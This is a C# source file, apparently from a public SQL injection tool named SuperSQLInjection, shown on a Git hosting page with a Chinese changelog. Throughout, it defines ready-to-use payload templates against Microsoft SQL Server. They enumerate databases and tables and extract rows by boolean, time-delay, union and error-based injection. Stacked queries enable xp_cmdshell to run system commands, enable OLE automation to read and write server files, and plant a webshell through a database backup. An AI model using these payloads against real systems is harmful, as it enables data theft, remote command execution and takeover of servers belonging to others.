shack2/SuperSQLInjectionV1
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
2ab15a40511ec94cc0110a17b7c4e887fedf2a59
SuperSQLInjectionV1/SuperSQLInjection/payload/SQLServer.cs
shack2 b18f7b73f9 update20181221 
20181221 V1.0 正式版---
修复盲注关键字判断机制,自动识别时,关键字相同且状态码相同才认为是true页面,解决在部分情况下可能出现错误500页面也存在同样关键字的问题。
修改SQLServer查询列时,使用char函数方式,避免单引号被过滤导致无法获取列名的问题。
修复SQLServer 执行命令,读写文件时,可能由于语句报错而导致读写文件失败的问题,优化提高成功率。
修复betweent and绕过时,将16进制字符替换了,导致语句错误而无法获取数据的问题。
修复自动识别在某些情况下跳过了错误显示注入检查。
修复Union注入重复发包判断列情况。
修复自动识别注入,在部分情况下无法正确判断数据库类型的问题。
修改爆出注入配置文件,降低漏报。
优化自动识别注入,如果程序判断支持盲注,会自动尝试使用order by去判断页面列数,提高Union注入检查的速度。
新增支持注入PostgreSQL文件读写功能。
2018-12-21 16:08:29 +08:00

283 lines
14 KiB
C#
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

using System;
using System.Collections.Generic;
using System.Text;
using tools;
namespace SuperSQLInjection.payload
{
class SQLServer
{
//加载对应配置(需要读取的环境变量)
public static String path = "config/vers/sqlserver.txt";
public static List<String> vers = FileTool.readFileToList(path);
//数据库数量
public static String dbs_count = "(select count(*) from [master]..[sysdatabases])";
//表数量
public static String tables_count = "(select count(*) from [{dbname}]..[sysobjects] where xtype=0x55)";
//列数量
public static String columns_count = "(select count(*) from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}'))";
//获取数据条数
public static String data_count = "(select count(*) from [{dbname}]..[{table}])";
//获取数据库名
public static String db_value = "(select (select top 1 name from (select top {index} name from [master]..[sysdatabases] order by name) t order by t.name desc))";
//获取表名称
public static String table_value = "(select (select top 1 name from [{dbname}]..[sysobjects] where xtype=0x55 and id not in (select top {index} id from [{dbname}]..[sysobjects] where xtype=0x55)))";
//获取列名称
public static String column_value = "(select (select top 1 name from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}') and colid not in (select top {index} colid from [{dbname}]..[syscolumns] where id=object_id('{dbname}..{table}'))))";
//获取数据库数量bool方式
public static String bool_db_count = " " + dbs_count + ">{len}";
//获取表数量bool
public static String bool_tables_count = " " + tables_count + ">{len}";
//获取列数量bool
public static String bool_columns_count = " " + columns_count + ">{len}";
public static String bool_datas_count = " " + data_count + ">={len}";
//多字符
public static String unicode_value = "cast(unicode(substring({data},{index},1)) as varchar(100))";
public static String nocast_unicode_value = "unicode(substring({data},{index},1))";
public static String substr = "substring(({data}),{index},1)";
public static String substr_value = "substring(({data}),{index},{len})";
//bool方式字符长度判断
public static String bool_length = " len({data})>{len}";
public static String bool_dataLength = " datalength({data})>{len}";
public static String bool_value = " {data}>{len}";
public static String check_li_value = " len({data})<{len}";
//bool方式获取值
//每个unicode值范围0-9
public static String bool_unicode_value = " (substring({data},{index},1))>{len}";
//获取行数据
public static String data_value = "(select top 1 {data} from (select top {index} {allcolumns} from [{dbname}]..[{table}] order by {orderby}) t order by {orderby} desc)";
//union获取值
public static String union_value = " 1=2 union all select {data}";
//error方式
public static String error_value = " convert(int,(char(94)+char(94)+char(33)+cast({data} as varchar(2000))+char(33)+char(94)+char(94)))=1";
//cmd
public static String createTableAndExecCmd = " 1=1;create table ssqlinjection(id int primary key identity,data varchar(8000));exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'xp_cmdshell',1;reconfigure;declare @cmd varchar(8000);set @cmd={cmd};insert into ssqlinjection(data) exec [master]..[xp_cmdshell] @cmd;select 1 where 1=1 ";
public static String cmdData = "cast((select top 1 data from ssqlinjection where id={index}) as varchar(8000))";
public static String cmdDataCount = "(select (select count(*) from ssqlinjection))";
public static String dropTable = " 1=1;drop table ssqlinjection;select 1 where 1=1 ";
public static String dropWriteFileBackUpTableAndDropDB = " 1=1;drop table [ssqlinjection]..[data];drop database ssqlinjection;select 1 where 1=1 ";
public static String createWriteFileBackUpTable = " 1=1;create table [ssqlinjection]..[data] (content image);select 1 where 1=1 ";
public static String createWriteFileBackUpDB = " 1=1;create database ssqlinjection;select 1 where 1=1 ";
//文件读写
public static String witeFileByFileSystemObject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);set @data={data};declare @path varchar(4000);set @path={path};exec [master]..[sp_oacreate] 'scripting.fileSystemObject',@object out;exec [master]..[sp_oamethod] @object,'createtextfile',@file output,@path;exec [master]..[sp_oamethod] @file,'write',null,@data;exec [master]..[sp_oamethod] @file,'close',null;select 1 where 1=1 ";
public static String witeFileBySP_MakeWebTask = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'web assistant procedures',1;reconfigure;declare @d varchar(8000);set @d={data};declare @p varchar(4000);set @p={path};exec sp_makewebtask @p, @d;select 1 where 1=1 ";
public static String witeFileByBackDataBase = " 1=1;insert into [ssqlinjection]..[data](content) values({data});declare @s varchar(8000);set @s={path} backup database ssqlinjection to disk=@s;select 1 where 1=1 ";
public static String readFileByFileSystemobject = " 1=1;exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'ole automation procedures',1;reconfigure;declare @object int;declare @file int;declare @data varchar(8000);exec [master]..[sp_oacreate] 'scripting.filesystemobject',@object out;exec [master]..[sp_oamethod] @object,'OpenTextFile',@file output,'{path}';create table ssqlinjection (data varchar(8000));exec [master]..[sp_oamethod] @file,'read',@data out,8000;insert into ssqlinjection(data) values(@data);select 1 where 1=1 ";
//读文件的的payload
public static String file_content = "(select data from ssqlinjection)";
public static String getBoolDataBySleep(String data, int maxTime)
{
return " 1=1 if(" + data + ") waitfor delay '0:0:" + maxTime + "'";
}
/// <summary>
/// 获取union的payload
/// </summary>
/// <param name="columnsLen">列长</param>
/// <param name="showIndex">显示列</param>
/// <param name="Fill">填充</param>
/// <param name="dbname">数据库名</param>
/// <param name="table">表名</param>
/// <param name="column">获取数据的字段</param>
/// <param name="index">第几行数据1开始</param>
public static String getUnionDataValue(int columnsLen,int showIndex,String Fill,String dbname,String table,List<String> columns,int index)
{
StringBuilder sb = new StringBuilder();
String data = data_value.Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]);
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{index}", index.ToString());
sb.Append("(char(94)+char(94)+char(33)+cast(" + d + " as varchar(8000))+char(33)+char(94)+char(94)),");
}
else
{
sb.Append(Fill + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
/// <summary>
/// </summary>
/// <param name="columnsLen">列长</param>
/// <param name="showIndex">显示列</param>
/// <param name="Fill">填充</param>
/// <param name="dataPayLoad">值payload</param>
/// <returns></returns>
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill,String dataPayLoad)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append("(char(94)+char(94)+char(33)+" + "cast(" + dataPayLoad + " as varchar(8000))+char(33)+char(94)+char(94)),");
}
else
{
sb.Append(Fill + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
public static String getUnionDataValueByCMD(int columnsLen, int showIndex, String Fill, String dataPayLoad)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append("(char(94)+char(94)+char(33)+cast(" + (dataPayLoad) + " as varchar(8000))+char(33)+char(94)+char(94)),");
}
else
{
sb.Append(Fill+",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
/// <summary>
/// 获取数据error
/// </summary>
/// <param name="columnsLen">列长</param>
/// <param name="showIndex">显示列</param>
/// <param name="Fill">填充</param>
/// <param name="dataPayLoad"></param>
/// <param name="dbname">数据库名</param>
/// <param name="table">表名</param>
/// <param name="index">第几行数据1开始</param>
/// <returns></returns>
public static String getUnionDataValue(int columnsLen, int showIndex, String Fill, String dataPayLoad,String dbname,String table,String index)
{
StringBuilder sb = new StringBuilder();
for (int i = 1; i <= columnsLen; i++)
{
if (i == showIndex)
{
sb.Append("(char(94)+char(94)+char(33)+" + (("cast(" + dataPayLoad + " as varchar(5000))").Replace("{dbname}", dbname).Replace("{table}", table).Replace("{index}", index)) + "+char(33)+char(94)+char(94)),");
}
else
{
sb.Append(Fill + ",");
}
}
sb.Remove(sb.Length - 1, 1);
return union_value.Replace("{data}", sb.ToString());
}
/// <summary>
///
/// </summary>
/// <param name="columnsLen">列长</param>
/// <param name="showIndex">显示列</param>
/// <param name="Fill">填充</param>
/// <param name="dbname">数据库名</param>
/// <param name="table">表名</param>
/// <param name="column">获取数据的字段</param>
/// <param name="index">第几行数据1开始</param>
public static String getErrorDataValue(String dbname, String table,int index,List<String> columns)
{
String data = data_value.Replace("{data}", concatAllColumnsByConcatStr(columns)).Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]);
String d = data.Replace("{dbname}", dbname).Replace("{table}", table).Replace("{column}", concatAllColumnsByConcatStr(columns)).Replace("{index}", index.ToString());
return error_value.Replace("{data}", d);
}
/// <summary>
/// 多字段拼接
/// </summary>
/// <param name="columns"></param>
/// <returns></returns>
public static String concatAllColumns(List<String> columns)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append(column);
sb.Append(",");
}
sb.Remove(sb.Length - 1, 1);
return sb.ToString();
}
/// <summary>
/// 多字段拼接,带连接符
/// </summary>
/// <param name="columns"></param>
/// <returns></returns>
public static String concatAllColumnsByConcatStr(List<String> columns)
{
StringBuilder sb = new StringBuilder();
foreach (String column in columns)
{
sb.Append("cast(isnull(" + column + ",0x20) as varchar(5000))+char(36)+char(36)+char(36)+");
}
sb.Remove(sb.Length - 28, 28);
return sb.ToString();
}
/// <summary>
/// 获得bool方式值payload
/// </summary>
/// <param name="dataStr">对应值的查询SQL</param>
/// <param name="dbName">数据库名</param>
/// <param name="table">表名</param>
/// <param name="index">下标</param>
/// <returns></returns>
public static String getBoolDataPayLoad(String column,List<String> columns,String dbName,String table,int index)
{
String data = data_value.Replace("{data}", "cast(isnull("+column+",0x20) as varchar)").Replace("{allcolumns}", concatAllColumns(columns)).Replace("{orderby}", columns[0]);
String payload = data.Replace("{dbname}", dbName).Replace("{table}", table).Replace("{index}", index.ToString());
return payload;
}
/// <summary>
/// 反射条调用,加载显示支持的文件操作
/// </summary>
/// <returns></returns>
public static List<String> getShowCanDoFile()
{
List<String> list = new List<String>();
list.Add("SQLServer FileSystemObject写文件");
list.Add("SQLServer Sp_MakeWebTask写文件");
list.Add("SQLServer 备份写WebShell(有多余数据)");
list.Add("SQLServer FileSystemObject读文件");
return list;
}
}
}
Reference in New Issue View Git Blame Copy Permalink